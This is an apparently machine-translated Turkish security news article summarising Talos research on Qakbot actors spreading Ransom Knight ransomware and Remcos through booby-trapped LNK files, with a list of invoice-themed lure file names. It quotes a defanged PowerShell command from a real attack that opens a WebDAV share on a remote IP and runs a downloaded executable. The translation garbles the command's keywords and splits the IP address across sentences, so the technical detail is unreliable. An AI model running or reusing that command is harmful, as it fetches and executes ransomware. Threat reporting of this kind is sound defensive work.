Qakbot, Knight Fidye Yazılımını ve Silahlandırılmış LNK Dosyalarını Sunuyor


Qakbot’un altyapısına ve kripto para varlıklarına, Ağustos 2023’te uluslararası müttefiklerin yardımıyla düzenlenen bir operasyonla hükümet yetkilileri tarafından el konuldu ve bu durum, Qakbot’un iştirakleri hakkında endişeleri artırdı.

Talos araştırmacıları, Qakbot tehdit aktörlerinin aktif kaldığına ve yakın zamanda Cyclops/Ransom Knight fidye yazılımı ve Remcos arka kapısıyla, geçmiş kampanyalara LNK dosya meta veri bağlantıları aracılığıyla takip edilen bir kampanya başlattıklarına inanıyor.

Talos araştırmacıları, Ocak 2023’teki “AA” ve “BB” kampanyalarını birbirine bağlayan tehdit aktörlerini izlemek için LNK dosyası meta verilerini kullandı.

Raporlarının ardından “AA”, “BB” ve “Obama” kampanyalarındaki Qakbot aktörleri, tespit ve takipten kaçınmak için LNK dosyası meta verilerini kaldırmaya başladı.

Belge

Ücretsiz demo

Yapay Zeka Destekli E-posta güvenlik çözümlerini uygulamak “Trustifi”, işletmenizi E-posta İzleme, Engelleme, Değiştirme, Kimlik Avı, Hesabın Devralınması, İş E-postasının Tehlikeye Atılması, Kötü Amaçlı Yazılım ve Fidye Yazılımı gibi günümüzün en tehlikeli e-posta tehditlerine karşı koruyabilir

Teknik Analiz

Aynı sistemdeki yeni LNK dosyaları, Ağustos 2023’te Talos tarafından keşfedildi ve bu, fidye yazılımı Ransom Knight’ı içeren bir ağ paylaşımına yol açtı. Analize göre kullanıcıları Powershell.exe’ye yönlendiriyorlar ve sonraki indirme adımı için parametreleri iletiyorlar: –

  • -c “kaşif ‘\\89[.]23[.]96[.]203@80\333\’”; Başlat-Uyku -Saniye 1; Durdurma İşlemi -Ad gezgini; \\89[.]23[.]96[.]203@80\333\bilgi.exe

Uzak IP 89’a erişmek için Explorer.exe’yi çalıştırma[.]23[.]96[.]WebDAV (bağlantı noktası 80) aracılığıyla H.203, PowerShell uzaktan yürütülebilir indirmeler (T1105) için komut satırı algılamasından kaçabilir.

Bu LNK dosya adları, Qakbot kampanyalarında kimlik avına işaret ederek acil mali konulara işaret ediyor. Aşağıda LNK dosyalarının tüm dosya adlarından bahsettik: –

  • DİKKAT-Fatura-29-Ağustos.docx.lnk
  • banka havalesi talebi.lnk
  • Rezervasyon info.pdf.lnk
  • ÖDENMEYEN Fatura Ağustos 2023.docx.lnk
  • SAHTEKARLIK banka havalesi raporu.pdf.lnk
  • fatura OTP bankası.pdf.lnk
  • ZORUNLU-Fatura-28-Ağustos.docx.lnk
  • Ödenmemiş-Fatura-26-Ağustos.pdf.lnk
  • Yeni banka bilgileri ve IBAN 2023.docx.lnk
  • Yeni banka bilgileri ve IBAN 2023.img.lnk
  • Ödeme-Faturalar-29-Ağustos.pdf.lnk
  • ACİL-Fatura-27-Ağustos.docx.lnk

İtalyanca dosya adları bölgesel hedeflemeye işaret ederken Zip arşivlerindeki LNK dosyaları, genellikle Excel eklentileri ve benzer simgelerle ilişkilendirilen XLL dosyalarına eşlik eder.

LNK dosyası, uzak IP 89’dan Ransom Knight yükünü getiriyor[.]23[.]96[.]Cyclops fidye yazılımının gelişmiş bir versiyonunu işaret eden WebDAV aracılığıyla 203, operatörü tarafından Mayıs 2023’te duyuruldu.

Uzmanlar, Qakbot tehdit aktörlerinin fidye yazılımı hizmetinin operatörleri değil müşterileri olduğunu öne sürüyor. Ağustos 2023’teki FBI operasyonu esas olarak kontrol sunucularını hedef alarak e-posta dağıtımını etkilemedi.

Qakbot dağıtımı yayından kaldırmanın ardından duraklatılmış olsa da operatörlerin altyapılarını yeniden inşa etmesi durumunda tehdit yeniden ortaya çıkabilir.

850’den fazla üçüncü taraf uygulamaya hızlı bir şekilde yama uygulamak için Patch Manager Plus’ı kullanarak kendinizi güvenlik açıklarından koruyun. Avantajlardan yararlanın ücretsiz deneme % 100 güvenlik sağlamak için.



Source link